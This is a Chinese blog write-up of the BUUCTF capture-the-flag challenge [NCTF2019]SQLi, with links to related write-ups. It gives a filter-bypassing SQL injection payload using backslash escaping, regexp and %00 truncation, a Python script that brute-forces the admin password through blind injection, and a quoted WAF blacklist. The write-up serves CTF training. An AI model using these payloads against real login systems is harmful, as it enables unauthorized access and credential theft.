BUUCTF-[NCTF2019]SQLi

最新推荐文章于 2022-06-13 20:12:06 发布
最新推荐文章于 2022-06-13 20:12:06 发布
阅读量325 收藏
点赞数
分类专栏: BUU-WEB 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/121098097
版权

[NCTF2019]SQLi

进入页面,sql语句直接被甩在脸上,尝试万能密码登录:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里有waf,先fuzzy一下:
在这里插入图片描述
过滤的东西有点多(真不愧sql语句能直接甩脸)
在robots.txt文件中有提示
在这里插入图片描述
再进入hint.txt
在这里插入图片描述
这里看到了黑名单,并且说要让我们查找admin的密码,但是admin在黑名单中,只能进行正则匹配了。
但是想在框框内进行正则不可能,单引号注释符全被过滤了。

sqlquery : select * from users where username='' and passwd=''
想要正则只能在单独进行,于是想到把将username后一个单引号进行转义,将' and passwd='就包裹在了username中,然后再进行正则爆破admin的密码。
payload:select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/\"^a\";%00'
这里%00不能被url编码,这里起到截断作用

爆破脚本:

import requests
from urllib import parse
import string

url = 'http://d6cebc84-d417-4828-b73c-0da2cf39738b.node4.buuoj.cn:81/'
num = 0
result = ''
string= string.ascii_lowercase + string.digits + '_'
for i in range (1,60):
    if num == 1 :
        break
    for j in string:
        data = {
            "username":"\\",
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((result+j),parse.unquote('%00'))
        }
        print(result+j)
        res = requests.post(url=url,data=data)
        if 'welcome' in res.text:
            result += j
            break
        if j=='_' and 'welcome' not in res.text:
            break

在这里插入图片描述

TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[NCTF2019]SQLi
qaq517384的博客
10-14 200
打开界面是一个有sql语句的登录框 老本行robots.txt发现有提示 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
BUUCTF--[NCTF2019]SQLi
qq_46263951的博客
07-14 423
首先我们在窗口中尝试一些闭合发现都被禁用了 通过使用御剑可以扫描到robots.txt文件,进入查看可以找到hint.txt文件 regexp正则注入 简单来说regexp用来匹配文本,不区分大小写,可以从头开始一位一位进行爆破 根据提示我们需要对passwd进行爆破,用户名可以任意 If $_POST['passwd'] === admin's password, Then you will get the flag; 空格由/**/,or可以用||代替 综上,我们可以大致构..
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1307
BUUCTF记录贴
[NCTF2019]SQLi
SopRomeo的博客
10-09 1291
下面回显了sql语句,根据sql语句闭合 直接注 有过滤,fuzz一波 过滤了蛮多东西的,‘被过滤了,常用注释被过滤,可以用;%00来代替 201得都被过滤了,找找没过滤的 发现 转义符没过滤,可以利用\转义分号从而构成这种闭合语句 select * from users where username=’’ and passwd=’;%00’ 接着再看看有哪些能用的函数 大部分函数都被禁 了,看到regexp没被过滤,那就可以利用正则,和BJD那次一样 mysql正则注入 我直接用BJD上次的脚本.
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
最新发布
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
刷题记录-[NCTF2019]SQLi
weixin_43610673的博客
05-09 2135
测试一下 应该是or被拦截了 简单fuzz一下 可以看到regexp是可以用的 题目也直接给了被过滤的关键词 找到admin的密码即可得flag 由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 '\' and passwd=' 形成闭合 构造passwd处为 ||/**/passwd/**/regexp/**/"^a";%00 用regexp查询passwd ^匹配字符串开头 %00截断后面的内容 但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值